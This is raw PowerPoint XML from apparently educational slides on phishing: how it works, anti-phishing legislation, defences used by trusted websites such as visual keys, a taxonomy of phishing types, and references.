              <a:t>Source: http://www.antiphishing.org/sponsors_technical_papers/symantec_online_fraud.pdf</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457199" y="0"/>
            <a:ext cx="8305801" cy="73572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i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>Fighting phishing attacks (email-based)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="914400"/>
            <a:ext cx="8668407" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>ISP provider can proactively scan email content and flag as suspected phishing email</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0"/>
            <a:ext cx="8229600" cy="762000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="ctr" fontAlgn="base">
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Fighting phishing attacks (legislation)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20483" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219200"/>
            <a:ext cx="8229600" cy="5105400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Anti-Phishing Act 2005</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> in USA recognizes phishing as a federal crime</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>“prohibits using the internet or an e-mail message to solicit or induce another to provide identifying information by pretending to be an on-line internet business” (http://definitions.uslegal.com)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Fines up to $250,000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="2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idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="185057" y="190500"/>
            <a:ext cx="8828314" cy="533400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>How trusted websites are dealing with phishing?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46085" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="914400"/>
            <a:ext cx="8382000" cy="914400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Require providing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>more than two pieces </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>of credential information </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Multiple stage of authentication and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>visual key </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>concept</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="990600" y="1981200"/>
            <a:ext cx="7315200" cy="4038601"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Right Arrow 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="707572" y="4420688"/>
            <a:ext cx="783772" cy="45719"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="C0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20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>
            </a:pPr>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="3200" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Helvetica"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idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="185057" y="190500"/>
            <a:ext cx="8828314" cy="533400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>How trusted websites are dealing with phishing?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="51203" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1066800" y="990600"/>
            <a:ext cx="7439706" cy="5005646"/>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81000" y="0"/>
            <a:ext cx="8229600" cy="736600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Phishing attack (stage 1): A phishing email</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10244" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="231228" y="5808076"/>
            <a:ext cx="8912772" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://www.webdevelopersnotes.com/articles/paypal_phishing_scam_email_attacks.php</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="838200" y="762000"/>
            <a:ext cx="6906308" cy="5071476"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="12" name="Straight Arrow Connector 11"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000">
            <a:off x="4014953" y="4614041"/>
            <a:ext cx="1198178" cy="304800"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="28575" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="C00000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="arrow"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4014952" y="4918842"/>
            <a:ext cx="3090042" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Hyperlink to a fake website</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idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="185057" y="190500"/>
            <a:ext cx="8828314" cy="533400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>How trusted websites are dealing with phishing?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1219200" y="1066800"/>
            <a:ext cx="6953250" cy="51054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457200" y="0"/>
            <a:ext cx="8229600" cy="762000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>Summary</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="92163" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1066800"/>
            <a:ext cx="8229600" cy="5257800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Phishing attack is performed by combining social engineering technique and web technology</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Steals personal and financial information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Already resulted in huge loss for trusted business and government institutes </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>No single way to prevent it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Browser-based technique, self-awareness, improved authentication mechanism can reduce the level of attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18994326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274638"/>
            <a:ext cx="8229600" cy="411162"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>References</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41987" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="914400"/>
            <a:ext cx="8229600" cy="5211763"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>[1] Anti-Phishing working group, http://www.antiphishing.org</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>[2] Go Phishing, David Geer, IEEE Technology and Society Magazine, June 2005, page 18-21.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>[3] Aaron </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>Emigh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>, Online Identity Theft: Phishing Technology, Chokepoints and Countermeasures, U.S. Department of Homeland Security, Science and Technology Directorate.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>[4] ZDNet, Targeted Spear Phishing Attack, http://www.zdnet.com/blog/security/targeted-spear-phishing-attacks/1032.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13744096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E691924A-9AF4-4C64-AAD8-5E1CD61C0B1A}"/>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13315"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60000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" i="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="1D21CD"/>
                </a:solidFill>
                <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Deceptive -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="1D21CD"/>
                </a:solidFill>
                <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" smtClean="0">
                <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Sending a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="1D21CD"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" smtClean="0">
                <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>deceptive email, in bulk, with a “call to action” that demands the recipient click on a link.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Webdings" panose="05030102010509060703" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1800"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6868AD8B-DD66-44EE-BAB5-6973D27BA8F6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{38133E69-F2BC-4E25-888B-A11C0C6FCE4F}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>33</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34978005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8F8E98B6-C818-485C-8F6A-287179460902}"/>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15363"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60000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" i="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="1D21CD"/>
                </a:solidFill>
                <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Malware-Based - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" smtClean="0">
                <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Running malicious software on the user’s machine.  Various forms of malware-based phishing are:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buClr>
                <a:srgbClr val="8989FF"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1400" smtClean="0">
              <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buClr>
                <a:srgbClr val="8989FF"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" b="1" i="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="1D21CD"/>
                </a:solidFill>
                <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Key Loggers &amp; Screen Loggers</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1800" b="1" smtClean="0">
              <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buClr>
                <a:srgbClr val="8989FF"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" b="1" i="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="1D21CD"/>
                </a:solidFill>
                <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Session Hijackers</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1800" b="1" smtClean="0">
              <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buClr>
                <a:srgbClr val="8989FF"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" b="1" i="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="1D21CD"/>
                </a:solidFill>
                <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Web Trojans</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1800" b="1" smtClean="0">
              <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buClr>
                <a:srgbClr val="8989FF"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" b="1" i="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="1D21CD"/>
                </a:solidFill>
                <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Data Theft</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1800" b="1" smtClean="0">
              <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="8989FF"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1800" b="1"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E0507B7C-B9E8-4C37-87DA-35B698399606}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{AF814DB5-DBC6-4F52-8189-A9E11CEAA50A}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>34</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20023767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0F9370C-AE82-4A09-883F-F0072ABDF7AC}"/>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17411"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b="1" i="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="1D21CD"/>
                </a:solidFill>
                <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>DNS-Based - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" smtClean="0">
                <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Phishing that interferes with the integrity of the lookup process for a domain name. Forms of DNS-based phishing are:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:srgbClr val="8989FF"/>
              </a:buClr>
